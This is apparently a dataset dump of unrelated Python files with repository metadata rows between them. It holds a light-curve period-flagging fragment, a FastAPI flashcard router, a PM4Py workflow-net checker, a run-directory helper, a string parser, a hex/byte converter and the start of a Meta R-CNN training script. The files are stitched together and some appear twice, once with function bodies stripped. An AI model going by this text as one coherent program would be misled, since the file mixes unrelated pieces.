""" Assigns a flag in the table for which periods are reliable.
"""
flag = 100
if period > maxperiod:
flag = 4
if (period < maxperiod) and (power > 0.005):
flag = 3
if (period < maxperiod) and (width <= period*0.6) and (power > 0.005):
flag = 2
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (power > 0.005)):
flag = 1
if ( (period < maxperiod) and (width <= period*0.6) and
(secpow < 0.96*power) and (np.abs(period-avg)<1.0) and (power > 0.005)):
flag = 0
if flag == 100:
flag = 5
return flag
def averaged_per_sector(self, tab):
""" Looks at targets observed in different sectors and determines
which period measured is likely the best period. Adds a column
to MeasureRotations.LS_results of 'true_period_days' for the
results.
Returns
-------
astropy.table.Table
"""
def flag_em(val, mode, lim):
if np.abs(val-mode) < lim:
return 0
else:
return 1
averaged_periods = np.zeros(len(tab))
flagging = np.zeros(len(tab), dtype=int)
limit = 0.3
for tic in np.unique(self.IDs):
inds = np.where(tab['Target_ID']==tic)[0]
primary = tab['period_days'].data[inds]
secondary = tab['secondary_period_days'].data[inds]
all_periods = np.append(primary, secondary)
# ind_flags = np.append(tab['oflag1'].data[inds],
# tab['oflag2'].data[inds])
avg = np.array([])
tflags = np.array([])
if len(inds) > 1:
try:
mode = stats.mode(np.round(all_periods,2))
if mode > 11.5:
avg = np.full(np.nanmean(primary), len(inds))
tflags = np.full(2, len(inds))
else:
for i in range(len(inds)):
if np.abs(primary[i]-mode) < limit:
avg = np.append(avg, primary[i])
tflags = np.append(tflags,0)
elif np.abs(secondary[i]-mode) < limit:
avg = np.append(avg, secondary[i])
tflags = np.append(tflags,1)
elif np.abs(primary[i]/2.-mode) < limit:
avg = np.append(avg, primary[i]/2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]/2.-mode) < limit:
avg = np.append(avg, secondary[i]/2.)
tflags = np.append(tflags,1)
elif np.abs(primary[i]*2.-mode) < limit:
avg = np.append(avg, primary[i]*2.)
tflags = np.append(tflags,0)
elif np.abs(secondary[i]*2.-mode) < limit:
avg = np.append(avg, secondary[i]*2.)
tflags = np.append(tflags,1)
else:
tflags = np.append(tflags, 2)
except:
for i in range(len(inds)):
if tab['oflag1'].data[inds[i]]==0 and tab['oflag2'].data[inds[i]]==0:
avg = np.append(avg, tab['period_days'].data[inds[i]])
tflags = np.append(tflags, 0)
else:
tflags = np.append(tflags,2)
else:
avg = np.nanmean(primary)
if tab['oflag1'].data[inds] == 0 and tab['oflag2'].data[inds]==0:
tflags = 0
else:
tflags = 2
averaged_periods[inds] = np.nanmean(avg)
flagging[inds] = tflags
tab.add_column(Column(flagging, 'Flags'))
tab.add_column(Column(averaged_periods, 'avg_period_days'))
return tab
def phase_lightcurve(self, table=None, trough=-0.5, peak=0.5, kernel_size=101):
"""
Finds and creates a phase light curve that traces the spots.
Uses only complete rotations and extrapolates outwards until the
entire light curve is covered.
Parameters
----------
table : astropy.table.Table, optional
Used for getting the periods of each light curve. Allows users
to use already created tables. Default = None. Will search for
stella.FindTheSpots.LS_results.
trough : float, optional
Sets the phase value at the minimum. Default = -0.5.
peak : float, optional
Sets the phase value t the maximum. Default = 0.5.
kernel_size : odd float, optional
Sets kernel size for median filter smoothing. Default = 15.
Attributes
----------
phases : np.ndarray
"""
def map_per_orbit(time, flux, kernel_size, cadences):
mf = medfilt(flux, kernel_size=kernel_size)
argmin = np.argmin(mf[:cadences])
mapping = np.linspace(0.5,-0.5, cadences)
phase = np.ones(len(flux))
full = int(np.floor(len(time)/cadences))
phase[0:argmin] = mapping[len(mapping)-argmin:]
points = np.arange(argmin, cadences*(full+1)+argmin, cadences, dtype=int)
for i in range(len(points)-1):
try:
phase[points[i]:points[i+1]] = mapping
except:
pass
remainder = len(np.where(phase==1.0)[0])
phase[len(phase)-remainder:] = mapping[0:remainder]
return phase
if table is None:
table = self.LS_results
PHASES = np.copy(self.flux)
for i in tqdm(range(len(table)), desc="Mapping phases"):
flag = table['Flags'].data[i]
if flag == 0 or flag == 1:
period = table['avg_period_days'].data[i] * u.day
cadences = int(np.round((period.to(u.min)/2).value))
all_time = self.time[i]
all_flux = self.flux[i]
diff = np.diff(all_time)
gaptime = np.where(diff>=np.nanmedian(diff)+12*np.nanstd(diff))[0][0]
t1, f1 = all_time[:gaptime+1], all_flux[:gaptime+1]
t2, f2 = all_time[gaptime+1:], all_flux[gaptime+1:]
o1map = map_per_orbit(t1, f1, kernel_size=101, cadences=cadences)
o2map = map_per_orbit(t2, f2, kernel_size=101, cadences=cadences)
phase = np.append(o1map, o2map)
else:
phase = np.zeros(len(self.flux[i]))
PHASES[i] = phase
self.phases = PHASES
| 3,082 | 0 | 120 |
70dbecde69f5350b76c86a87b6e8a98005d66126 | 4,777 | py | Python | api/routes/flashcard.py | axxander/FlashcardAPI | b7221aa567b2c59700813a3cab46d58ca7897086 | [
"MIT"
] | null | null | null | api/routes/flashcard.py | axxander/FlashcardAPI | b7221aa567b2c59700813a3cab46d58ca7897086 | [
"MIT"
] | null | null | null | api/routes/flashcard.py | axxander/FlashcardAPI | b7221aa567b2c59700813a3cab46d58ca7897086 | [
"MIT"
] | null | null | null | from typing import List
from fastapi import APIRouter, Depends, HTTPException, status
from app import schemas, models
from app.services.jwt import get_current_user
router = APIRouter(
prefix="/flashcard",
tags=["flashcard"]
)
# Create new flashcard
@router.post("/", response_model=schemas.Flashcard)
# List all flashcards
@router.get("/", response_model=List[schemas.Flashcard])
# Get flashcards of specific category
@router.get("/{category}", response_model=List[schemas.Flashcard])
# Get flashcard by ID
@router.get("/id/{flashcard_id}", response_model=schemas.Flashcard)
# Update flashcard by ID
@router.put("/id/{flashcard_id}", response_model=schemas.Flashcard)
# Bulk change category name
@router.put("/{category}", response_model=schemas.RenameFlashcardCategory)
# Delete flashcard by ID
@router.delete("/id/{flashcard_id}", response_model=int)
# Delete flashcard by category
@router.delete("/{category}", response_model=int) | 29.487654 | 87 | 0.6973 | from typing import List
from fastapi import APIRouter, Depends, HTTPException, status
from app import schemas, models
from app.services.jwt import get_current_user
router = APIRouter(
prefix="/flashcard",
tags=["flashcard"]
)
# Create new flashcard
@router.post("/", response_model=schemas.Flashcard)
async def create_flashcard(
new_flashcard: schemas.FlashcardCreate,
user: schemas.User = Depends(get_current_user)
) -> schemas.Flashcard:
# Create flashcard in DB with FK of user id
flashcard = await models.Flashcard.create(
**new_flashcard.dict(),
user=await models.User.filter(id=user.id).get()
)
return schemas.Flashcard.from_orm(flashcard)
# List all flashcards
@router.get("/", response_model=List[schemas.Flashcard])
async def get_flashcards(
user: schemas.User = Depends(get_current_user)
) -> List[schemas.Flashcard]:
# Fetch user's flashcards
flashcards = await models.Flashcard.filter(user_id=user.id)
return [
*map(
lambda flashcard: schemas.Flashcard.from_orm(flashcard),
flashcards
)
]
# Get flashcards of specific category
@router.get("/{category}", response_model=List[schemas.Flashcard])
async def get_flashcards_specific_category(
category: str,
user: schemas.User = Depends(get_current_user)
) -> List[schemas.Flashcard]:
# Fetch user's flashcards with category: category
flashcards = await models.Flashcard.filter(user_id=user.id, category=category)
if not flashcards:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"the category '{category}' does not exist"
)
return [
*map(
lambda flashcard: schemas.Flashcard.from_orm(flashcard),
flashcards
)
]
# Get flashcard by ID
@router.get("/id/{flashcard_id}", response_model=schemas.Flashcard)
async def get_flashcard_by_id(
flashcard_id: int,
user: schemas.User = Depends(get_current_user)
) -> schemas.Flashcard:
# Fetch user's flashcard with flashcard ID: flashcard_id
flashcard = await models.Flashcard.get_or_none(id=flashcard_id, user_id=user.id)
if flashcard is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"flashcard does not exist"
)
return schemas.Flashcard.from_orm(flashcard)
# Update flashcard by ID
@router.put("/id/{flashcard_id}", response_model=schemas.Flashcard)
async def update_flashcard_by_id(
flashcard_id: int,
updated_flashcard: schemas.FlashcardCreate,
user: schemas.User = Depends(get_current_user)
) -> schemas.Flashcard:
# Update user's flashcard with flashcard ID: flashcard_id
updated = await models.Flashcard.filter(id=flashcard_id, user_id=user.id).update(
**updated_flashcard.dict()
)
if not updated: # flashcard with ID: flashcard_id does not exist
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"flashcard does not exist"
)
return schemas.Flashcard.from_orm(
await models.Flashcard.filter(
id=flashcard_id,
user_id=user.id
).get()
)
# Bulk change category name
@router.put("/{category}", response_model=schemas.RenameFlashcardCategory)
async def update_category_name(
category: str,
new_category_name: str,
user: schemas.User = Depends(get_current_user)
) -> schemas.RenameFlashcardCategory:
# Update category name for user's set of flashcards
updated = await models.Flashcard.filter(user_id=user.id, category=category).update(
category=new_category_name
)
if not updated:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"category does not exist"
)
return schemas.RenameFlashcardCategory(
current_category_name=category,
new_category_name=new_category_name
)
# Delete flashcard by ID
@router.delete("/id/{flashcard_id}", response_model=int)
async def delete_flashcard_by_id(
flashcard_id: int,
user: schemas.User = Depends(get_current_user)
) -> int:
# Delete flashcard with flashcard ID: flashcard_id
await models.Flashcard.filter(id=flashcard_id, user_id=user.id).delete()
return status.HTTP_204_NO_CONTENT
# Delete flashcard by category
@router.delete("/{category}", response_model=int)
async def delete_flashcards_by_category(
category: str,
user: schemas.User = Depends(get_current_user)
) -> int:
# Delete all flashcards with category: category
await models.Flashcard.filter(category=category, user_id=user.id).delete()
return status.HTTP_204_NO_CONTENT | 3,636 | 0 | 176 |
8efe44c0c18ac4acd87d73e2cad4d86b35c3048e | 1,654 | py | Python | ws2122-lspm/Lib/site-packages/pm4py/evaluation/wf_net/evaluator.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | ws2122-lspm/Lib/site-packages/pm4py/evaluation/wf_net/evaluator.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | ws2122-lspm/Lib/site-packages/pm4py/evaluation/wf_net/evaluator.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
import warnings
from enum import Enum
import deprecation
from pm4py.evaluation.wf_net.variants import petri_net
from pm4py.util import exec_utils
@deprecation.deprecated(deprecated_in='2.2.2', removed_in='3.0.0',
details='this wf-net check is moved to the pm4py.algo.analysis package')
| 31.207547 | 102 | 0.696493 | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
import warnings
from enum import Enum
import deprecation
from pm4py.evaluation.wf_net.variants import petri_net
from pm4py.util import exec_utils
class Variants(Enum):
PETRI_NET = petri_net
@deprecation.deprecated(deprecated_in='2.2.2', removed_in='3.0.0',
                        details='this wf-net check is moved to the pm4py.algo.analysis package')
def apply(net, parameters=None, variant=Variants.PETRI_NET):
    """
    Checks if a Petri net is a workflow net

    Parameters
    ---------------
    net
        Petri net
    parameters
        Parameters of the algorithm
    variant
        Variant of the algorithm, possible values:
        - Variants.PETRI_NET

    Returns
    ---------------
    boolean
        Boolean value
    """
    # Bug fix: the docstring previously appeared *after* warnings.warn(...),
    # which makes it a plain no-op string expression rather than the function
    # docstring (help()/__doc__ were empty). It must be the first statement.
    warnings.warn('this wf-net check is moved to the pm4py.algo.analysis package', DeprecationWarning)
    # Dispatch to the selected variant implementation.
    return exec_utils.get_variant(variant).apply(net, parameters=parameters)
| 550 | 26 | 45 |
cee50dbaf550492b0b7a5acbd949e37a38288f3b | 801 | py | Python | src/zzsn2021/utils/rundir.py | 2021L-ZZSN/template | 0cea7744701bb702d563acbf0cbd9ecf371f45bf | [
"MIT"
] | null | null | null | src/zzsn2021/utils/rundir.py | 2021L-ZZSN/template | 0cea7744701bb702d563acbf0cbd9ecf371f45bf | [
"MIT"
] | null | null | null | src/zzsn2021/utils/rundir.py | 2021L-ZZSN/template | 0cea7744701bb702d563acbf0cbd9ecf371f45bf | [
"MIT"
] | 1 | 2021-05-09T21:27:39.000Z | 2021-05-09T21:27:39.000Z | from __future__ import annotations
import os
from datetime import datetime
import coolname # type: ignore
from dotenv import load_dotenv
load_dotenv()
def setup_rundir():
    """Create the working directory for this run under a random slug name.

    Side effects: sets RUN_NAME and RUN_DIR (plus WANDB_MODE in debug mode)
    in the process environment and creates the directory on disk.
    """
    stamp = datetime.now().strftime("%Y%m%d-%H%M")
    slug = coolname.generate_slug(2)  # type: ignore
    run_name = f'{stamp}-{slug}'
    os.environ['RUN_NAME'] = run_name
    root = f'{os.getenv("RESULTS_DIR")}/{os.getenv("WANDB_PROJECT")}'
    if os.getenv('RUN_MODE', '').lower() == 'debug':
        # Debug runs are quarantined under _debug and never report to W&B.
        os.environ['WANDB_MODE'] = 'disabled'
        run_dir = f'{root}/_debug/{run_name}'
    else:
        run_dir = f'{root}/{run_name}'
    os.makedirs(run_dir, exist_ok=True)
    os.environ['RUN_DIR'] = run_dir
| 27.62069 | 77 | 0.656679 | from __future__ import annotations
import os
from datetime import datetime
import coolname # type: ignore
from dotenv import load_dotenv
load_dotenv()
def setup_rundir():
    """
    Create a working directory with a randomly generated run name.
    """
    # Run name is "<YYYYmmdd-HHMM>-<two-word-slug>", e.g. "20240101-1200-brave-otter".
    date = datetime.now().strftime("%Y%m%d-%H%M")
    name = coolname.generate_slug(2)  # type: ignore
    os.environ['RUN_NAME'] = f'{date}-{name}'
    # Results live under $RESULTS_DIR/$WANDB_PROJECT (both read from the environment).
    results_root = f'{os.getenv("RESULTS_DIR")}/{os.getenv("WANDB_PROJECT")}'
    if os.getenv('RUN_MODE', '').lower() == 'debug':
        # Debug runs go to a separate _debug subtree and disable W&B reporting.
        run_dir = f'{results_root}/_debug/{os.getenv("RUN_NAME")}'
        os.environ['WANDB_MODE'] = 'disabled'
    else:
        run_dir = f'{results_root}/{os.getenv("RUN_NAME")}'
    os.makedirs(run_dir, exist_ok=True)
    # Expose the created directory to the rest of the program via RUN_DIR.
    os.environ['RUN_DIR'] = run_dir
os.environ['RUN_DIR'] = run_dir
| 0 | 0 | 0 |
5ee4f693c91d826992e4ab0a99fcaee72fdb7edb | 2,705 | py | Python | src/configflow/misc/string.py | volodymyrPivoshenko/configflow | 2158c8395c4913b836c2a27e38c51f5ec519323b | [
"MIT"
] | 8 | 2022-01-25T09:06:34.000Z | 2022-03-28T14:55:45.000Z | src/configflow/misc/string.py | volodymyrPivoshenko/configflow | 2158c8395c4913b836c2a27e38c51f5ec519323b | [
"MIT"
] | 23 | 2022-01-23T15:15:00.000Z | 2022-03-28T21:47:15.000Z | src/configflow/misc/string.py | volodymyrPivoshenko/configflow | 2158c8395c4913b836c2a27e38c51f5ec519323b | [
"MIT"
] | 1 | 2022-03-15T21:08:19.000Z | 2022-03-15T21:08:19.000Z | """Module for the string helper functions and primitive data types."""
from __future__ import annotations
import ast
import typing
import apm
# WPS600 - inheritance from the str is the only way to implement correct
# error message with all str functionality
class ErrorMessage(str):  # noqa: WPS600
    """A ``str`` subclass whose ``repr`` preserves formatting.

    Exception messages are rendered via ``repr``, so ordinary strings show
    escaped ``\\n`` sequences instead of real line breaks. Returning the
    plain string from ``__repr__`` makes multi-line error messages render
    with their intended formatting in tracebacks.

    References
    ----------
    1. `New line on error message in KeyError - Python 3.3 <https://stackoverflow.com/questions/
    46892261/new-line-on-error-message-in-keyerror-python-3-3>`_
    """

    def __repr__(self) -> str:
        """Return the message text itself so tracebacks keep line breaks."""
        return str(self)
def parse(value: str) -> typing.Optional[typing.Any]:
    """Parse a string value to the appropriate Python object.

    Note
    ----
    If a value is a sequence ``list | tuple | set`` then ``parse`` function will be applied
    to each element of a sequence.

    Warnings
    --------
    - Currently ``parse`` function supports only primitive data types ``int | str | float``
    and sequences ``list | tuple | set``. Sequences such as ``dict`` will be returned as they are
    without parsing their inner values.
    - If a value can't be parsed it will be returned as it is.

    Examples
    --------
    >>> parse("1.2")
    1.2
    >>> parse("(1, 2, '3')")
    (1, 2, 3)
    >>> parse("['85', '0.23', 'cleffa', ['10', ['0.123'], 'blipbug']]")
    [85, 0.23, 'cleffa', [10, [0.123], 'blipbug']]
    """
    try:
        literal = ast.literal_eval(value)
    except ValueError:
        # literal_eval raises ValueError for non-literal strings (e.g. bare
        # words like "cleffa"): sequences are still parsed element-wise,
        # everything else is returned unchanged.
        original_type = type(value)
        return (
            apm.case(value)
            .of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, value)))
            .otherwise(lambda _: value)
        )
    except SyntaxError:
        # Malformed literals (e.g. "[1,") cannot be evaluated at all.
        return value
    original_type = type(literal)
    return (
        apm.case(literal)
        # Integral floats ("1.0") are narrowed to int; other floats kept as-is.
        .of(apm.InstanceOf(float), lambda _: int(literal) if literal.is_integer() else literal)
        # Recurse into sequences, preserving the concrete container type.
        .of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, literal)))
        .otherwise(lambda _: literal)
    )
| 29.086022 | 99 | 0.602957 | """Module for the string helper functions and primitive data types."""
from __future__ import annotations
import ast
import typing
import apm
# WPS600 - inheritance from the str is the only way to implement correct
# error message with all str functionality
class ErrorMessage(str):  # noqa: WPS600
    """Implementation of the error message.

    Note
    ----
    By default, error messages in the exceptions don't support line breaks
    or any formatting, this decorator is solving that problem.

    References
    ----------
    1. `New line on error message in KeyError - Python 3.3 <https://stackoverflow.com/questions/
    46892261/new-line-on-error-message-in-keyerror-python-3-3>`_
    """

    def __repr__(self) -> str:
        r"""Get object representation.

        Examples
        --------
        >>> msg = ErrorMessage("\nInvalid argument: 'db'.\nExpected arguments: ['db2', 'port'].")
        >>> repr(msg)
        \nInvalid argument: 'db'.\nExpected arguments: ['db2', 'port'].
        >>> raise ValueError(msg)
        Traceback (most recent call last):
        ...
        ValueError:
        Invalid argument: 'db'.
        Expected arguments: ['db2', 'port'].
        """
        # Delegating repr -> str means tracebacks print the message verbatim,
        # preserving embedded line breaks instead of showing "\n" escapes.
        return self.__str__()
def parse(value: str) -> typing.Optional[typing.Any]:
    """Parse a string value to the appropriate Python object.

    Note
    ----
    If a value is a sequence ``list | tuple | set`` then ``parse`` function will be applied
    to each element of a sequence.

    Warnings
    --------
    - Currently ``parse`` function supports only primitive data types ``int | str | float``
    and sequences ``list | tuple | set``. Sequences such as ``dict`` will be returned as they are
    without parsing their inner values.
    - If a value can't be parsed it will be returned as it is.

    Examples
    --------
    >>> parse("1.2")
    1.2
    >>> parse("(1, 2, '3')")
    (1, 2, 3)
    >>> parse("['85', '0.23', 'cleffa', ['10', ['0.123'], 'blipbug']]")
    [85, 0.23, 'cleffa', [10, [0.123], 'blipbug']]
    """
    try:
        literal = ast.literal_eval(value)
    except ValueError:
        # Non-literal content (bare identifiers etc.): recurse into sequences,
        # otherwise hand the value back untouched.
        original_type = type(value)
        return (
            apm.case(value)
            .of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, value)))
            .otherwise(lambda _: value)
        )
    except SyntaxError:
        # Syntactically broken literals are returned unchanged.
        return value
    original_type = type(literal)
    return (
        apm.case(literal)
        # "1.0" -> 1 (integral floats become int), "1.2" stays float.
        .of(apm.InstanceOf(float), lambda _: int(literal) if literal.is_integer() else literal)
        # Parse sequence elements recursively, keeping the container type.
        .of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, literal)))
        .otherwise(lambda _: literal)
    )
| 0 | 0 | 0 |
5024b443babb9d5f7f10c485d8a141f2f3c148b8 | 2,403 | py | Python | recipes/Python/510399_Byte_Hex_Hex_Byte_String/recipe-510399.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/510399_Byte_Hex_Hex_Byte_String/recipe-510399.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/510399_Byte_Hex_Hex_Byte_String/recipe-510399.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | """
HexByteConversion
Convert a byte string to it's hex representation for output or visa versa.
ByteToHex converts byte string "\xFF\xFE\x00\x01" to the string "FF FE 00 01"
HexToByte converts string "FF FE 00 01" to the byte string "\xFF\xFE\x00\x01"
"""
#-------------------------------------------------------------------------------
def ByteToHex( byteStr ):
    """
    Convert a byte string to its space-separated uppercase hex representation,
    e.g. "\\xFF\\xFE" -> "FF FE". An empty input yields an empty string.
    """
    # Format every byte as two uppercase hex digits, then glue with single spaces.
    return " ".join("%02X" % ord(ch) for ch in byteStr)
#-------------------------------------------------------------------------------
def HexToByte( hexStr ):
    """
    Convert a string of hex byte values into the corresponding byte string,
    e.g. "FF FE" -> "\\xFF\\xFE". The pairs may or may not be space separated.
    """
    digits = hexStr.replace(" ", "")
    # Consume two hex digits at a time; each pair becomes one character.
    return "".join(chr(int(digits[pos:pos + 2], 16)) for pos in range(0, len(digits), 2))
#-------------------------------------------------------------------------------
# test data - different formats but equivalent data
__hexStr1 = "FFFFFF5F8121070C0000FFFFFFFF5F8129010B"  # packed form
__hexStr2 = "FF FF FF 5F 81 21 07 0C 00 00 FF FF FF FF 5F 81 29 01 0B"  # space-separated form
__byteStr = "\xFF\xFF\xFF\x5F\x81\x21\x07\x0C\x00\x00\xFF\xFF\xFF\xFF\x5F\x81\x29\x01\x0B"
# Self-test harness. NOTE: Python 2 print statements — this module targets Python 2.
if __name__ == "__main__":
    print "\nHex To Byte and Byte To Hex Conversion"
    print "Test 1 - ByteToHex - Passed: ", ByteToHex( __byteStr ) == __hexStr2
    print "Test 2 - HexToByte - Passed: ", HexToByte( __hexStr1 ) == __byteStr
    print "Test 3 - HexToByte - Passed: ", HexToByte( __hexStr2 ) == __byteStr
    # turn a non-space separated hex string into a space separated hex string!
    print "Test 4 - Combined - Passed: ", \
          ByteToHex( HexToByte( __hexStr1 ) ) == __hexStr2
| 35.338235 | 90 | 0.554307 | """
HexByteConversion
Convert a byte string to it's hex representation for output or visa versa.
ByteToHex converts byte string "\xFF\xFE\x00\x01" to the string "FF FE 00 01"
HexToByte converts string "FF FE 00 01" to the byte string "\xFF\xFE\x00\x01"
"""
#-------------------------------------------------------------------------------
def ByteToHex( byteStr ):
    """
    Render *byteStr* as space-separated uppercase hex pairs
    (e.g. "\\xFF\\xFE\\x00\\x01" -> "FF FE 00 01").
    """
    pieces = []
    for ch in byteStr:
        pieces.append("%02X" % ord(ch))
    return " ".join(pieces)
def HexToByte( hexStr ):
    """
    Decode space-separated (or packed) hex pairs back into a byte string
    (e.g. "FF FE 00 01" -> "\\xFF\\xFE\\x00\\x01").
    """
    digits = hexStr.replace(" ", "")
    decoded = []
    index = 0
    while index < len(digits):
        decoded.append(chr(int(digits[index:index + 2], 16)))
        index += 2
    return "".join(decoded)
# test data - different formats but equivalent data
__hexStr1 = "FFFFFF5F8121070C0000FFFFFFFF5F8129010B"
__hexStr2 = "FF FF FF 5F 81 21 07 0C 00 00 FF FF FF FF 5F 81 29 01 0B"
__byteStr = "\xFF\xFF\xFF\x5F\x81\x21\x07\x0C\x00\x00\xFF\xFF\xFF\xFF\x5F\x81\x29\x01\x0B"
if __name__ == "__main__":
print "\nHex To Byte and Byte To Hex Conversion"
print "Test 1 - ByteToHex - Passed: ", ByteToHex( __byteStr ) == __hexStr2
print "Test 2 - HexToByte - Passed: ", HexToByte( __hexStr1 ) == __byteStr
print "Test 3 - HexToByte - Passed: ", HexToByte( __hexStr2 ) == __byteStr
# turn a non-space separated hex string into a space separated hex string!
print "Test 4 - Combined - Passed: ", \
ByteToHex( HexToByte( __hexStr1 ) ) == __hexStr2
| 0 | 0 | 0 |
6810b1a32afedd13cfa216ce1724b423ebb45fe3 | 24,325 | py | Python | train_metarcnn.py | Anqw/meta_edge | 3c4b138f85d0c2c13c6cc1ee71e621737b40525c | [
"AFL-1.1"
] | null | null | null | train_metarcnn.py | Anqw/meta_edge | 3c4b138f85d0c2c13c6cc1ee71e621737b40525c | [
"AFL-1.1"
] | null | null | null | train_metarcnn.py | Anqw/meta_edge | 3c4b138f85d0c2c13c6cc1ee71e621737b40525c | [
"AFL-1.1"
] | null | null | null | # --------------------------------------------------------
# Pytorch Meta R-CNN
# Written by Anny Xu, Xiaopeng Yan, based on the code from Jianwei Yang
# --------------------------------------------------------
import _init_paths
import os
import sys
import numpy as np
import argparse
import pprint
import pdb
import time
import collections
import torch
import torch.nn as nn
import torch.optim as optim
import random
from tensorboardX import SummaryWriter
import torchvision.transforms as transforms
from torch.utils.data.sampler import Sampler
from torch.autograd import Variable
import torch.utils.data as Data
from roi_data_layer.roidb import combined_roidb, rank_roidb_ratio, filter_class_roidb
from roi_data_layer.roibatchLoader import roibatchLoader
from model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from model.utils.net_utils import weights_normal_init, save_net, load_net, \
adjust_learning_rate, save_checkpoint, clip_gradient
from model.faster_rcnn.resnet import resnet
import pickle
from datasets.metadata import MetaDataset
from collections import OrderedDict
def _str2bool(value):
    """Convert a command-line string into a real boolean.

    argparse's ``type=bool`` is a well-known trap: ``bool("False")`` is True,
    so every boolean option passed any non-empty value silently became True.
    This converter accepts the usual textual spellings of both values.
    """
    if isinstance(value, bool):
        return value
    lowered = value.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected, got %r' % value)


def parse_args():
    """
    Parse input arguments.

    Returns an argparse.Namespace with dataset/model selection, training
    hyper-parameters, meta-learning options and checkpoint/resume settings.
    """
    parser = argparse.ArgumentParser(description='Train Meta R-CNN network')
    # Define training data and Model
    parser.add_argument('--dataset', dest='dataset',
                        help='training dataset:coco2017,coco,pascal_07_12',
                        default='pascal_voc_0712', type=str)
    parser.add_argument('--net', dest='net',
                        help='metarcnn',
                        default='metarcnn', type=str)
    # Define display and save dir
    parser.add_argument('--start_epoch', dest='start_epoch',
                        help='starting epoch',
                        default=1, type=int)
    parser.add_argument('--epochs', dest='max_epochs',
                        help='number of epochs to train',
                        default=21, type=int)
    parser.add_argument('--disp_interval', dest='disp_interval',
                        help='number of iterations to display',
                        default=100, type=int)
    parser.add_argument('--checkpoint_interval', dest='checkpoint_interval',
                        help='number of iterations to display',
                        default=10000, type=int)
    parser.add_argument('--save_dir', dest='save_dir',
                        help='directory to save models', default="./models",
                        type=str)
    # Define training parameters
    parser.add_argument('--nw', dest='num_workers',
                        help='number of worker to load data',
                        default=0, type=int)
    # Bug fix: boolean options now use _str2bool. They previously used
    # type=bool, which made e.g. "--cuda False" evaluate to True.
    parser.add_argument('--cuda', dest='cuda', default=True, type=_str2bool,
                        help='whether use CUDA')
    parser.add_argument('--bs', dest='batch_size',
                        help='batch_size',
                        default=1, type=int)
    parser.add_argument('--cag', dest='class_agnostic', default=False, type=_str2bool,
                        help='whether perform class_agnostic bbox regression')
    # Define meta parameters
    parser.add_argument('--meta_train', dest='meta_train', default=False, type=_str2bool,
                        help='whether perform meta training')
    parser.add_argument('--meta_loss', dest='meta_loss', default=False, type=_str2bool,
                        help='whether perform adding meta loss')
    parser.add_argument('--transductive', dest='transductive', default=True, type=_str2bool,
                        help='whether perform transductive')
    parser.add_argument('--visualization', dest='visualization', default=False, type=_str2bool,
                        help='whether perform visualization')
    parser.add_argument('--phase', dest='phase',
                        help='the phase of training process',
                        default=1, type=int)
    parser.add_argument('--shots', dest='shots',
                        help='the number meta input of PRN network',
                        default=1, type=int)
    parser.add_argument('--meta_type', dest='meta_type', default=1, type=int,
                        help='choose which sets of metaclass')
    # config optimization
    parser.add_argument('--o', dest='optimizer',
                        help='training optimizer',
                        default="sgd", type=str)
    parser.add_argument('--lr', dest='lr',
                        help='starting learning rate',
                        default=0.001, type=float)
    parser.add_argument('--lr_decay_step', dest='lr_decay_step',
                        help='step to do learning rate decay, unit is epoch',
                        default=4, type=int)
    parser.add_argument('--lr_decay_gamma', dest='lr_decay_gamma',
                        help='learning rate decay ratio',
                        default=0.1, type=float)
    # set training session
    parser.add_argument('--s', dest='session',
                        help='training session',
                        default=1, type=int)
    # resume trained model
    parser.add_argument('--r', dest='resume',
                        help='resume checkpoint or not',
                        default=False, type=_str2bool)
    parser.add_argument('--checksession', dest='checksession',
                        help='checksession to load model',
                        default=1, type=int)
    parser.add_argument('--checkepoch', dest='checkepoch',
                        help='checkepoch to load model',
                        default=10, type=int)
